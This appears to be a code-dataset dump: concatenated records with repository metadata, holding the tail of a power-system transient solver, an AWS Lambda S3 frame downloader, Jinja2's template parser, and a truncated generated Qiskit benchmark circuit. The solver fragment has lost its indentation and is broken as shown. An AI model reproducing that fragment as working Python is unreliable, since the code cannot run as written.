A_c_i = np.vstack((np.hstack((eye-0.5*Dt*F_x_i, -0.5*Dt*F_y_i)),
np.hstack((G_x_i, G_y_i))))
f_n_i = x_i - x - 0.5*Dt*(f_i+f)
# print(t,iter,g_i)
Dxy_i = np.linalg.solve(-A_c_i,np.vstack((f_n_i,g_i)))
x_i = x_i + Dxy_i[0:N_x]
y_i = y_i + Dxy_i[N_x:(N_x+N_y)]
struct[i].x[:] = x_i
struct[i].y_run[:] = y_i
# [f_i,g_i,F_x_i,F_y_i,G_x_i,G_y_i] = smib_transient(x_i,y_i,u);
# A_c_i = [[eye(N_x)-0.5*Dt*F_x_i, -0.5*Dt*F_y_i],
# [ G_x_i, G_y_i]];
# f_n_i = x_i - x - 0.5*Dt*(f_i+f);
# Dxy_i = -A_c_i\[f_n_i.',g_i.'].';
# x_i = x_i + Dxy_i(1:N_x);
# y_i = y_i + Dxy_i(N_x+1:N_x+N_y);
xy = np.vstack((x_i,y_i))
max_relative = 0.0
for it_var in range(N_x+N_y):
abs_value = np.abs(xy[it_var,0])
if abs_value < 0.001:
abs_value = 0.001
relative_error = np.abs(Dxy_i[it_var,0])/abs_value
if relative_error > max_relative: max_relative = relative_error
if max_relative<struct[i].itol:
break
# if iter>struct[i].imax-2:
# print('Convergence problem')
struct[i].x[:] = x_i
struct[i].y_run[:] = y_i
# channels
if struct[i].store == 1:
it_store = struct[i].it_store
if struct[i].it >= it_store*decimation:
struct[i]['T'][it_store+1] = t
struct[i].X[it_store+1,:] = struct[i].x[:,0]
struct[i].Y[it_store+1,:] = struct[i].y_run[:,0]
struct[i].Z[it_store+1,:] = struct[i].h[:,0]
struct[i].iters[it_store+1,0] = iter
struct[i].it_store += 1
struct[i].t = t
return t
def nonzeros():
Fx_ini_rows = [0]
Fx_ini_cols = [0]
Fy_ini_rows = []
Fy_ini_cols = []
Gx_ini_rows = [0]
Gx_ini_cols = [0]
Gy_ini_rows = [0]
Gy_ini_cols = [0]
return Fx_ini_rows,Fx_ini_cols,Fy_ini_rows,Fy_ini_cols,Gx_ini_rows,Gx_ini_cols,Gy_ini_rows,Gy_ini_cols | 30.353047 | 178 | 0.491852 |
912db262ad6b5c5ed6f01fc7bf0894969fb374bc | 932 | py | Python | src/lambda/ppe-detector-function/main/utils/frame_downloader.py | gai6948/video-analytics-for-ppe-compliance | bb41ac010f5917bd7e85adfed689489f24830617 | [
"Apache-2.0"
] | null | null | null | src/lambda/ppe-detector-function/main/utils/frame_downloader.py | gai6948/video-analytics-for-ppe-compliance | bb41ac010f5917bd7e85adfed689489f24830617 | [
"Apache-2.0"
] | null | null | null | src/lambda/ppe-detector-function/main/utils/frame_downloader.py | gai6948/video-analytics-for-ppe-compliance | bb41ac010f5917bd7e85adfed689489f24830617 | [
"Apache-2.0"
] | null | null | null | from typing import Any, Tuple, Dict
import boto3
import timeit
from aws_lambda_powertools.logging import Logger
from aws_lambda_powertools.tracing import Tracer
logger = Logger(service='face-detector', child=True)
tracer = Tracer(service='face-detector')
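# download_frame fetches one frame object from S3 and returns its raw bytes plus the
# object's user metadata. Illustrative call (bucket and key names are assumptions):
# frame_bytes, meta = download_frame('frames-bucket', 'cam1/0001.jpg', None)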
@tracer.capture_method(capture_response=False)
def download_frame(bucket_name: str, key: str, s3_client: Any = None) -> Tuple[bytes, Dict[str, str]]:
start_time = timeit.default_timer()
if s3_client is None:
s3_client = boto3.client('s3')
try:
resp = s3_client.get_object(
Bucket=bucket_name,
Key=key
)
frame_data = resp["Body"].read()
metadata = resp["Metadata"]
logger.info(
f'Frame downloaded from S3 completed after: {timeit.default_timer() - start_time}')
return frame_data, metadata
except Exception:
logger.exception("Error downloading frame from S3")
raise
| 30.064516 | 96 | 0.680258 |
7403b0864e2bdbdf23d83ab3a6d029d1743de893 | 36,060 | py | Python | jinja2/parser.py | captainmalloc/jinja | 540b260198285f0ed41fbe80c0b1b6f13be579c1 | [
"BSD-3-Clause"
] | 1 | 2020-07-06T05:53:18.000Z | 2020-07-06T05:53:18.000Z | jinja2/parser.py | captainmalloc/jinja | 540b260198285f0ed41fbe80c0b1b6f13be579c1 | [
"BSD-3-Clause"
] | null | null | null | jinja2/parser.py | captainmalloc/jinja | 540b260198285f0ed41fbe80c0b1b6f13be579c1 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
jinja2.parser
~~~~~~~~~~~~~
Implements the template parser.
:copyright: (c) 2017 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
from jinja2 import nodes
from jinja2.exceptions import TemplateSyntaxError, TemplateAssertionError
from jinja2.lexer import describe_token, describe_token_expr
from jinja2._compat import imap
_statement_keywords = frozenset(['for', 'if', 'block', 'extends', 'print',
'macro', 'include', 'from', 'import',
'set', 'with', 'autoescape'])
_compare_operators = frozenset(['eq', 'ne', 'lt', 'lteq', 'gt', 'gteq'])
_math_nodes = {
'add': nodes.Add,
'sub': nodes.Sub,
'mul': nodes.Mul,
'div': nodes.Div,
'floordiv': nodes.FloorDiv,
'mod': nodes.Mod,
}
class Parser(object):
"""This is the central parsing class Jinja uses. It's passed to
extensions and can be used to parse expressions or statements.
"""
def __init__(self, environment, source, name=None, filename=None,
state=None):
self.environment = environment
self.stream = environment._tokenize(source, name, filename, state)
self.name = name
self.filename = filename
self.closed = False
self.extensions = {}
for extension in environment.iter_extensions():
for tag in extension.tags:
self.extensions[tag] = extension.parse
self._last_identifier = 0
self._tag_stack = []
self._end_token_stack = []
def fail(self, msg, lineno=None, exc=TemplateSyntaxError):
"""Convenience method that raises `exc` with the message, passed
line number or last line number as well as the current name and
filename.
"""
if lineno is None:
lineno = self.stream.current.lineno
raise exc(msg, lineno, self.name, self.filename)
def _fail_ut_eof(self, name, end_token_stack, lineno):
expected = []
for exprs in end_token_stack:
expected.extend(imap(describe_token_expr, exprs))
if end_token_stack:
currently_looking = ' or '.join(
"'%s'" % describe_token_expr(expr)
for expr in end_token_stack[-1])
else:
currently_looking = None
if name is None:
message = ['Unexpected end of template.']
else:
message = ['Encountered unknown tag \'%s\'.' % name]
if currently_looking:
if name is not None and name in expected:
message.append('You probably made a nesting mistake. Jinja '
'is expecting this tag, but currently looking '
'for %s.' % currently_looking)
else:
message.append('Jinja was looking for the following tags: '
'%s.' % currently_looking)
if self._tag_stack:
message.append('The innermost block that needs to be '
'closed is \'%s\'.' % self._tag_stack[-1])
self.fail(' '.join(message), lineno)
def fail_unknown_tag(self, name, lineno=None):
"""Called if the parser encounters an unknown tag. Tries to fail
with a human readable error message that could help to identify
the problem.
"""
return self._fail_ut_eof(name, self._end_token_stack, lineno)
def fail_eof(self, end_tokens=None, lineno=None):
"""Like fail_unknown_tag but for end of template situations."""
stack = list(self._end_token_stack)
if end_tokens is not None:
stack.append(end_tokens)
return self._fail_ut_eof(None, stack, lineno)
def is_tuple_end(self, extra_end_rules=None):
"""Are we at the end of a tuple?"""
if self.stream.current.type in ('variable_end', 'block_end', 'rparen'):
return True
elif extra_end_rules is not None:
return self.stream.current.test_any(extra_end_rules)
return False
def free_identifier(self, lineno=None):
"""Return a new free identifier as :class:`~jinja2.nodes.InternalName`."""
self._last_identifier += 1
rv = object.__new__(nodes.InternalName)
nodes.Node.__init__(rv, 'fi%d' % self._last_identifier, lineno=lineno)
return rv
def parse_statement(self):
"""Parse a single statement."""
token = self.stream.current
if token.type != 'name':
self.fail('tag name expected', token.lineno)
self._tag_stack.append(token.value)
pop_tag = True
try:
if token.value in _statement_keywords:
return getattr(self, 'parse_' + self.stream.current.value)()
if token.value == 'call':
return self.parse_call_block()
if token.value == 'filter':
return self.parse_filter_block()
ext = self.extensions.get(token.value)
if ext is not None:
return ext(self)
# did not work out, remove the token we pushed by accident
# from the stack so that the unknown tag fail function can
# produce a proper error message.
self._tag_stack.pop()
pop_tag = False
self.fail_unknown_tag(token.value, token.lineno)
finally:
if pop_tag:
self._tag_stack.pop()
def parse_statements(self, end_tokens, drop_needle=False):
"""Parse multiple statements into a list until one of the end tokens
is reached. This is used to parse the body of statements as it also
parses template data if appropriate. The parser checks first if the
current token is a colon and skips it if there is one. Then it checks
for the block end and parses until if one of the `end_tokens` is
reached. Per default the active token in the stream at the end of
the call is the matched end token. If this is not wanted `drop_needle`
can be set to `True` and the end token is removed.
"""
# the first token may be a colon for python compatibility
self.stream.skip_if('colon')
# in the future it would be possible to add whole code sections
# by adding some sort of end of statement token and parsing those here.
self.stream.expect('block_end')
result = self.subparse(end_tokens)
# we reached the end of the template too early, the subparser
# does not check for this, so we do that now
if self.stream.current.type == 'eof':
self.fail_eof(end_tokens)
if drop_needle:
next(self.stream)
return result
def parse_set(self):
"""Parse an assign statement."""
lineno = next(self.stream).lineno
target = self.parse_assign_target(with_namespace=True)
if self.stream.skip_if('assign'):
expr = self.parse_tuple()
return nodes.Assign(target, expr, lineno=lineno)
filter_node = self.parse_filter(None)
body = self.parse_statements(('name:endset',),
drop_needle=True)
return nodes.AssignBlock(target, filter_node, body, lineno=lineno)
def parse_for(self):
"""Parse a for loop."""
lineno = self.stream.expect('name:for').lineno
target = self.parse_assign_target(extra_end_rules=('name:in',))
self.stream.expect('name:in')
iter = self.parse_tuple(with_condexpr=False,
extra_end_rules=('name:recursive',))
test = None
if self.stream.skip_if('name:if'):
test = self.parse_expression()
recursive = self.stream.skip_if('name:recursive')
body = self.parse_statements(('name:endfor', 'name:else'))
if next(self.stream).value == 'endfor':
else_ = []
else:
else_ = self.parse_statements(('name:endfor',), drop_needle=True)
return nodes.For(target, iter, body, else_, test,
recursive, lineno=lineno)
def parse_if(self):
"""Parse an if construct."""
node = result = nodes.If(lineno=self.stream.expect('name:if').lineno)
while 1:
node.test = self.parse_tuple(with_condexpr=False)
node.body = self.parse_statements(('name:elif', 'name:else',
'name:endif'))
node.elif_ = []
node.else_ = []
token = next(self.stream)
if token.test('name:elif'):
node = nodes.If(lineno=self.stream.current.lineno)
result.elif_.append(node)
continue
elif token.test('name:else'):
result.else_ = self.parse_statements(('name:endif',),
drop_needle=True)
break
return result
def parse_with(self):
node = nodes.With(lineno=next(self.stream).lineno)
targets = []
values = []
while self.stream.current.type != 'block_end':
lineno = self.stream.current.lineno
if targets:
self.stream.expect('comma')
target = self.parse_assign_target()
target.set_ctx('param')
targets.append(target)
self.stream.expect('assign')
values.append(self.parse_expression())
node.targets = targets
node.values = values
node.body = self.parse_statements(('name:endwith',),
drop_needle=True)
return node
def parse_autoescape(self):
node = nodes.ScopedEvalContextModifier(lineno=next(self.stream).lineno)
node.options = [
nodes.Keyword('autoescape', self.parse_expression())
]
node.body = self.parse_statements(('name:endautoescape',),
drop_needle=True)
return nodes.Scope([node])
def parse_block(self):
node = nodes.Block(lineno=next(self.stream).lineno)
node.name = self.stream.expect('name').value
node.scoped = self.stream.skip_if('name:scoped')
# common problem people encounter when switching from django
# to jinja. we do not support hyphens in block names, so let's
# raise a nicer error message in that case.
if self.stream.current.type == 'sub':
self.fail('Block names in Jinja have to be valid Python '
'identifiers and may not contain hyphens, use an '
'underscore instead.')
node.body = self.parse_statements(('name:endblock',), drop_needle=True)
self.stream.skip_if('name:' + node.name)
return node
def parse_extends(self):
node = nodes.Extends(lineno=next(self.stream).lineno)
node.template = self.parse_expression()
return node
def parse_import_context(self, node, default):
if self.stream.current.test_any('name:with', 'name:without') and \
self.stream.look().test('name:context'):
node.with_context = next(self.stream).value == 'with'
self.stream.skip()
else:
node.with_context = default
return node
def parse_include(self):
node = nodes.Include(lineno=next(self.stream).lineno)
node.template = self.parse_expression()
if self.stream.current.test('name:ignore') and \
self.stream.look().test('name:missing'):
node.ignore_missing = True
self.stream.skip(2)
else:
node.ignore_missing = False
return self.parse_import_context(node, True)
def parse_import(self):
node = nodes.Import(lineno=next(self.stream).lineno)
node.template = self.parse_expression()
self.stream.expect('name:as')
node.target = self.parse_assign_target(name_only=True).name
return self.parse_import_context(node, False)
def parse_from(self):
node = nodes.FromImport(lineno=next(self.stream).lineno)
node.template = self.parse_expression()
self.stream.expect('name:import')
node.names = []
def parse_context():
if self.stream.current.value in ('with', 'without') and \
self.stream.look().test('name:context'):
node.with_context = next(self.stream).value == 'with'
self.stream.skip()
return True
return False
while 1:
if node.names:
self.stream.expect('comma')
if self.stream.current.type == 'name':
if parse_context():
break
target = self.parse_assign_target(name_only=True)
if target.name.startswith('_'):
self.fail('names starting with an underline can not '
'be imported', target.lineno,
exc=TemplateAssertionError)
if self.stream.skip_if('name:as'):
alias = self.parse_assign_target(name_only=True)
node.names.append((target.name, alias.name))
else:
node.names.append(target.name)
if parse_context() or self.stream.current.type != 'comma':
break
else:
self.stream.expect('name')
if not hasattr(node, 'with_context'):
node.with_context = False
return node
def parse_signature(self, node):
node.args = args = []
node.defaults = defaults = []
self.stream.expect('lparen')
while self.stream.current.type != 'rparen':
if args:
self.stream.expect('comma')
arg = self.parse_assign_target(name_only=True)
arg.set_ctx('param')
if self.stream.skip_if('assign'):
defaults.append(self.parse_expression())
elif defaults:
self.fail('non-default argument follows default argument')
args.append(arg)
self.stream.expect('rparen')
def parse_call_block(self):
node = nodes.CallBlock(lineno=next(self.stream).lineno)
if self.stream.current.type == 'lparen':
self.parse_signature(node)
else:
node.args = []
node.defaults = []
node.call = self.parse_expression()
if not isinstance(node.call, nodes.Call):
self.fail('expected call', node.lineno)
node.body = self.parse_statements(('name:endcall',), drop_needle=True)
return node
def parse_filter_block(self):
node = nodes.FilterBlock(lineno=next(self.stream).lineno)
node.filter = self.parse_filter(None, start_inline=True)
node.body = self.parse_statements(('name:endfilter',),
drop_needle=True)
return node
def parse_macro(self):
node = nodes.Macro(lineno=next(self.stream).lineno)
node.name = self.parse_assign_target(name_only=True).name
self.parse_signature(node)
node.body = self.parse_statements(('name:endmacro',),
drop_needle=True)
return node
def parse_print(self):
node = nodes.Output(lineno=next(self.stream).lineno)
node.nodes = []
while self.stream.current.type != 'block_end':
if node.nodes:
self.stream.expect('comma')
node.nodes.append(self.parse_expression())
return node
def parse_assign_target(self, with_tuple=True, name_only=False,
extra_end_rules=None, with_namespace=False):
"""Parse an assignment target. As Jinja allows assignments to
tuples, this function can parse all allowed assignment targets. Per
default assignments to tuples are parsed, that can be disable however
by setting `with_tuple` to `False`. If only assignments to names are
wanted `name_only` can be set to `True`. The `extra_end_rules`
parameter is forwarded to the tuple parsing function. If
`with_namespace` is enabled, a namespace assignment may be parsed.
"""
if with_namespace and self.stream.look().type == 'dot':
token = self.stream.expect('name')
next(self.stream) # dot
attr = self.stream.expect('name')
target = nodes.NSRef(token.value, attr.value, lineno=token.lineno)
elif name_only:
token = self.stream.expect('name')
target = nodes.Name(token.value, 'store', lineno=token.lineno)
else:
if with_tuple:
target = self.parse_tuple(simplified=True,
extra_end_rules=extra_end_rules)
else:
target = self.parse_primary()
target.set_ctx('store')
if not target.can_assign():
self.fail('can\'t assign to %r' % target.__class__.
__name__.lower(), target.lineno)
return target
def parse_expression(self, with_condexpr=True):
"""Parse an expression. Per default all expressions are parsed, if
the optional `with_condexpr` parameter is set to `False` conditional
expressions are not parsed.
"""
if with_condexpr:
return self.parse_condexpr()
return self.parse_or()
def parse_condexpr(self):
lineno = self.stream.current.lineno
expr1 = self.parse_or()
while self.stream.skip_if('name:if'):
expr2 = self.parse_or()
if self.stream.skip_if('name:else'):
expr3 = self.parse_condexpr()
else:
expr3 = None
expr1 = nodes.CondExpr(expr2, expr1, expr3, lineno=lineno)
lineno = self.stream.current.lineno
return expr1
def parse_or(self):
lineno = self.stream.current.lineno
left = self.parse_and()
while self.stream.skip_if('name:or'):
right = self.parse_and()
left = nodes.Or(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_and(self):
lineno = self.stream.current.lineno
left = self.parse_not()
while self.stream.skip_if('name:and'):
right = self.parse_not()
left = nodes.And(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_not(self):
if self.stream.current.test('name:not'):
lineno = next(self.stream).lineno
return nodes.Not(self.parse_not(), lineno=lineno)
return self.parse_compare()
def parse_compare(self):
lineno = self.stream.current.lineno
expr = self.parse_math1()
ops = []
while 1:
token_type = self.stream.current.type
if token_type in _compare_operators:
next(self.stream)
ops.append(nodes.Operand(token_type, self.parse_math1()))
elif self.stream.skip_if('name:in'):
ops.append(nodes.Operand('in', self.parse_math1()))
elif (self.stream.current.test('name:not') and
self.stream.look().test('name:in')):
self.stream.skip(2)
ops.append(nodes.Operand('notin', self.parse_math1()))
else:
break
lineno = self.stream.current.lineno
if not ops:
return expr
return nodes.Compare(expr, ops, lineno=lineno)
def parse_math1(self):
lineno = self.stream.current.lineno
left = self.parse_concat()
while self.stream.current.type in ('add', 'sub'):
cls = _math_nodes[self.stream.current.type]
next(self.stream)
right = self.parse_concat()
left = cls(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_concat(self):
lineno = self.stream.current.lineno
args = [self.parse_math2()]
while self.stream.current.type == 'tilde':
next(self.stream)
args.append(self.parse_math2())
if len(args) == 1:
return args[0]
return nodes.Concat(args, lineno=lineno)
def parse_math2(self):
lineno = self.stream.current.lineno
left = self.parse_pow()
while self.stream.current.type in ('mul', 'div', 'floordiv', 'mod'):
cls = _math_nodes[self.stream.current.type]
next(self.stream)
right = self.parse_pow()
left = cls(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_pow(self):
lineno = self.stream.current.lineno
left = self.parse_unary()
while self.stream.current.type == 'pow':
next(self.stream)
right = self.parse_unary()
left = nodes.Pow(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_unary(self, with_filter=True):
token_type = self.stream.current.type
lineno = self.stream.current.lineno
if token_type == 'sub':
next(self.stream)
node = nodes.Neg(self.parse_unary(False), lineno=lineno)
elif token_type == 'add':
next(self.stream)
node = nodes.Pos(self.parse_unary(False), lineno=lineno)
else:
node = self.parse_primary()
node = self.parse_postfix(node)
if with_filter:
node = self.parse_filter_expr(node)
return node
def parse_primary(self):
token = self.stream.current
if token.type == 'name':
if token.value in ('true', 'false', 'True', 'False'):
node = nodes.Const(token.value in ('true', 'True'),
lineno=token.lineno)
elif token.value in ('none', 'None'):
node = nodes.Const(None, lineno=token.lineno)
else:
node = nodes.Name(token.value, 'load', lineno=token.lineno)
next(self.stream)
elif token.type == 'string':
next(self.stream)
buf = [token.value]
lineno = token.lineno
while self.stream.current.type == 'string':
buf.append(self.stream.current.value)
next(self.stream)
node = nodes.Const(''.join(buf), lineno=lineno)
elif token.type in ('integer', 'float'):
next(self.stream)
node = nodes.Const(token.value, lineno=token.lineno)
elif token.type == 'lparen':
next(self.stream)
node = self.parse_tuple(explicit_parentheses=True)
self.stream.expect('rparen')
elif token.type == 'lbracket':
node = self.parse_list()
elif token.type == 'lbrace':
node = self.parse_dict()
else:
self.fail("unexpected '%s'" % describe_token(token), token.lineno)
return node
def parse_tuple(self, simplified=False, with_condexpr=True,
extra_end_rules=None, explicit_parentheses=False):
"""Works like `parse_expression` but if multiple expressions are
delimited by a comma a :class:`~jinja2.nodes.Tuple` node is created.
This method could also return a regular expression instead of a tuple
if no commas were found.
The default parsing mode is a full tuple. If `simplified` is `True`
only names and literals are parsed. The `with_condexpr` parameter is
forwarded to :meth:`parse_expression`.
Because tuples do not require delimiters and may end in a bogus comma
an extra hint is needed that marks the end of a tuple. For example
for loops support tuples between `for` and `in`. In that case the
`extra_end_rules` is set to ``['name:in']``.
`explicit_parentheses` is true if the parsing was triggered by an
expression in parentheses. This is used to figure out if an empty
tuple is a valid expression or not.
"""
lineno = self.stream.current.lineno
if simplified:
parse = self.parse_primary
elif with_condexpr:
parse = self.parse_expression
else:
parse = lambda: self.parse_expression(with_condexpr=False)
args = []
is_tuple = False
while 1:
if args:
self.stream.expect('comma')
if self.is_tuple_end(extra_end_rules):
break
args.append(parse())
if self.stream.current.type == 'comma':
is_tuple = True
else:
break
lineno = self.stream.current.lineno
if not is_tuple:
if args:
return args[0]
# if we don't have explicit parentheses, an empty tuple is
# not a valid expression. This would mean nothing (literally
# nothing) in the spot of an expression would be an empty
# tuple.
if not explicit_parentheses:
self.fail('Expected an expression, got \'%s\'' %
describe_token(self.stream.current))
return nodes.Tuple(args, 'load', lineno=lineno)
def parse_list(self):
token = self.stream.expect('lbracket')
items = []
while self.stream.current.type != 'rbracket':
if items:
self.stream.expect('comma')
if self.stream.current.type == 'rbracket':
break
items.append(self.parse_expression())
self.stream.expect('rbracket')
return nodes.List(items, lineno=token.lineno)
def parse_dict(self):
token = self.stream.expect('lbrace')
items = []
while self.stream.current.type != 'rbrace':
if items:
self.stream.expect('comma')
if self.stream.current.type == 'rbrace':
break
key = self.parse_expression()
self.stream.expect('colon')
value = self.parse_expression()
items.append(nodes.Pair(key, value, lineno=key.lineno))
self.stream.expect('rbrace')
return nodes.Dict(items, lineno=token.lineno)
def parse_postfix(self, node):
while 1:
token_type = self.stream.current.type
if token_type == 'dot' or token_type == 'lbracket':
node = self.parse_subscript(node)
# calls are valid both after postfix expressions (getattr
# and getitem) as well as filters and tests
elif token_type == 'lparen':
node = self.parse_call(node)
else:
break
return node
def parse_filter_expr(self, node):
while 1:
token_type = self.stream.current.type
if token_type == 'pipe':
node = self.parse_filter(node)
elif token_type == 'name' and self.stream.current.value == 'is':
node = self.parse_test(node)
# calls are valid both after postfix expressions (getattr
# and getitem) as well as filters and tests
elif token_type == 'lparen':
node = self.parse_call(node)
else:
break
return node
def parse_subscript(self, node):
token = next(self.stream)
if token.type == 'dot':
attr_token = self.stream.current
next(self.stream)
if attr_token.type == 'name':
return nodes.Getattr(node, attr_token.value, 'load',
lineno=token.lineno)
elif attr_token.type != 'integer':
self.fail('expected name or number', attr_token.lineno)
arg = nodes.Const(attr_token.value, lineno=attr_token.lineno)
return nodes.Getitem(node, arg, 'load', lineno=token.lineno)
if token.type == 'lbracket':
args = []
while self.stream.current.type != 'rbracket':
if args:
self.stream.expect('comma')
args.append(self.parse_subscribed())
self.stream.expect('rbracket')
if len(args) == 1:
arg = args[0]
else:
arg = nodes.Tuple(args, 'load', lineno=token.lineno)
return nodes.Getitem(node, arg, 'load', lineno=token.lineno)
self.fail('expected subscript expression', token.lineno)
def parse_subscribed(self):
lineno = self.stream.current.lineno
if self.stream.current.type == 'colon':
next(self.stream)
args = [None]
else:
node = self.parse_expression()
if self.stream.current.type != 'colon':
return node
next(self.stream)
args = [node]
if self.stream.current.type == 'colon':
args.append(None)
elif self.stream.current.type not in ('rbracket', 'comma'):
args.append(self.parse_expression())
else:
args.append(None)
if self.stream.current.type == 'colon':
next(self.stream)
if self.stream.current.type not in ('rbracket', 'comma'):
args.append(self.parse_expression())
else:
args.append(None)
else:
args.append(None)
return nodes.Slice(lineno=lineno, *args)
def parse_call(self, node):
token = self.stream.expect('lparen')
args = []
kwargs = []
dyn_args = dyn_kwargs = None
require_comma = False
def ensure(expr):
if not expr:
self.fail('invalid syntax for function call expression',
token.lineno)
while self.stream.current.type != 'rparen':
if require_comma:
self.stream.expect('comma')
# support for trailing comma
if self.stream.current.type == 'rparen':
break
if self.stream.current.type == 'mul':
ensure(dyn_args is None and dyn_kwargs is None)
next(self.stream)
dyn_args = self.parse_expression()
elif self.stream.current.type == 'pow':
ensure(dyn_kwargs is None)
next(self.stream)
dyn_kwargs = self.parse_expression()
else:
if self.stream.current.type == 'name' and \
self.stream.look().type == 'assign':
# Parsing a kwarg
ensure(dyn_kwargs is None)
key = self.stream.current.value
self.stream.skip(2)
value = self.parse_expression()
kwargs.append(nodes.Keyword(key, value,
lineno=value.lineno))
else:
# Parsing an arg
ensure(dyn_args is None and dyn_kwargs is None and not kwargs)
args.append(self.parse_expression())
require_comma = True
self.stream.expect('rparen')
if node is None:
return args, kwargs, dyn_args, dyn_kwargs
return nodes.Call(node, args, kwargs, dyn_args, dyn_kwargs,
lineno=token.lineno)
def parse_filter(self, node, start_inline=False):
while self.stream.current.type == 'pipe' or start_inline:
if not start_inline:
next(self.stream)
token = self.stream.expect('name')
name = token.value
while self.stream.current.type == 'dot':
next(self.stream)
name += '.' + self.stream.expect('name').value
if self.stream.current.type == 'lparen':
args, kwargs, dyn_args, dyn_kwargs = self.parse_call(None)
else:
args = []
kwargs = []
dyn_args = dyn_kwargs = None
node = nodes.Filter(node, name, args, kwargs, dyn_args,
dyn_kwargs, lineno=token.lineno)
start_inline = False
return node
def parse_test(self, node):
token = next(self.stream)
if self.stream.current.test('name:not'):
next(self.stream)
negated = True
else:
negated = False
name = self.stream.expect('name').value
while self.stream.current.type == 'dot':
next(self.stream)
name += '.' + self.stream.expect('name').value
dyn_args = dyn_kwargs = None
kwargs = []
if self.stream.current.type == 'lparen':
args, kwargs, dyn_args, dyn_kwargs = self.parse_call(None)
elif (self.stream.current.type in ('name', 'string', 'integer',
'float', 'lparen', 'lbracket',
'lbrace') and not
self.stream.current.test_any('name:else', 'name:or',
'name:and')):
if self.stream.current.test('name:is'):
self.fail('You cannot chain multiple tests with is')
arg_node = self.parse_primary()
arg_node = self.parse_postfix(arg_node)
args = [arg_node]
else:
args = []
node = nodes.Test(node, name, args, kwargs, dyn_args,
dyn_kwargs, lineno=token.lineno)
if negated:
node = nodes.Not(node, lineno=token.lineno)
return node
def subparse(self, end_tokens=None):
body = []
data_buffer = []
add_data = data_buffer.append
if end_tokens is not None:
self._end_token_stack.append(end_tokens)
def flush_data():
if data_buffer:
lineno = data_buffer[0].lineno
body.append(nodes.Output(data_buffer[:], lineno=lineno))
del data_buffer[:]
try:
while self.stream:
token = self.stream.current
if token.type == 'data':
if token.value:
add_data(nodes.TemplateData(token.value,
lineno=token.lineno))
next(self.stream)
elif token.type == 'variable_begin':
next(self.stream)
add_data(self.parse_tuple(with_condexpr=True))
self.stream.expect('variable_end')
elif token.type == 'block_begin':
flush_data()
next(self.stream)
if end_tokens is not None and \
self.stream.current.test_any(*end_tokens):
return body
rv = self.parse_statement()
if isinstance(rv, list):
body.extend(rv)
else:
body.append(rv)
self.stream.expect('block_end')
else:
raise AssertionError('internal parsing error')
flush_data()
finally:
if end_tokens is not None:
self._end_token_stack.pop()
return body
def parse(self):
"""Parse the whole template into a `Template` node."""
result = nodes.Template(self.subparse(), lineno=1)
result.set_environment(self.environment)
return result
| 39.713656 | 82 | 0.559013 |
1dc2475117c0ab3ba67abcc868afaf8cb91bea9c | 4,199 | py | Python | benchmark/startQiskit_noisy2667.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startQiskit_noisy2667.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startQiskit_noisy2667.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | # qubit number=4
# total number=40
import cirq
import qiskit
from qiskit.providers.aer import QasmSimulator
from qiskit.test.mock import FakeVigo
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
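# Quick check of the two helpers (illustrative): bitwise_xor("101", "110") == "110"
# (per-index xor, then reversed) and bitwise_dot("101", "110") == "1" (dot product mod 2).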
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[3]) # number=19
prog.y(input_qubit[2]) # number=36
prog.cz(input_qubit[0],input_qubit[3]) # number=20
prog.h(input_qubit[3]) # number=21
prog.cx(input_qubit[0],input_qubit[3]) # number=14
prog.cx(input_qubit[0],input_qubit[3]) # number=25
prog.cx(input_qubit[0],input_qubit[3]) # number=28
prog.x(input_qubit[3]) # number=29
prog.cx(input_qubit[0],input_qubit[3]) # number=30
prog.cx(input_qubit[3],input_qubit[1]) # number=35
prog.y(input_qubit[2]) # number=34
prog.cx(input_qubit[0],input_qubit[3]) # number=27
prog.h(input_qubit[3]) # number=22
prog.cz(input_qubit[0],input_qubit[3]) # number=23
prog.h(input_qubit[3]) # number=24
prog.cx(input_qubit[0],input_qubit[3]) # number=13
prog.h(input_qubit[3]) # number=18
prog.z(input_qubit[3]) # number=10
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.h(input_qubit[0]) # number=37
prog.cz(input_qubit[3],input_qubit[0]) # number=38
prog.h(input_qubit[0]) # number=39
prog.z(input_qubit[3]) # number=32
